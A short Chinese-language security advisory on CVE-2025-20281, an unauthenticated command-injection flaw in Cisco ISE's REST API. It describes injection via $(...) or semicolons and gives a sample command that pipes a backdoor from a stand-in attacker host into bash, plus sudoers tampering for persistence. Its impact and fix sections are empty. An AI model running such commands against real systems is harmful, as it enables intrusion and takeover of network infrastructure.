

漏洞情况
近期,火山信安实验室监测发现, Cisco Identity Services Engine (ISE) 的 REST API 接口存在高危安全漏洞(CVE-2025-20281,CVSS v3.1 评分 9.8/10)。该漏洞源于 ISE 未对特定 API 端点实施身份验证和授权检查,攻击者无需任何凭证即可通过构造恶意 HTTP 请求,直接在受影响设备上执行任意操作系统命令,导致完全系统控制。
0x01漏洞利用方式
攻击者可通过向 CSE ISE 管理接口的未公开 API 端点(如 /ers/config/networkdevice/ 或 /admin/API/mnt/Session/,具体路径需结合实际环境探测)发送特制 POST 请求,在请求体中注入恶意操作系统命令(如通过命令替换 $(...) 或分号拼接 ; 实现无交互执行);一旦命令触发,攻击者可进一步利用该漏洞下载并执行恶意二进制文件(例如通过 curl http://attacker.com/backdoor | bash 植入后门),或直接修改系统关键配置文件(如 /etc/sudoers 赋予攻击者持久化特权),结合 ISE 在企业网络中通常具备的高权限(如管理核心交换机、无线控制器及认证策略),攻击者可横向渗透内网,窃取敏感数据(如用户凭证、网络拓扑)或破坏关键基础设施(如篡改访问控制策略导致网络瘫痪)。
0x02影响范围
0x03修复方案
来源自:广州盈基信息官网
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。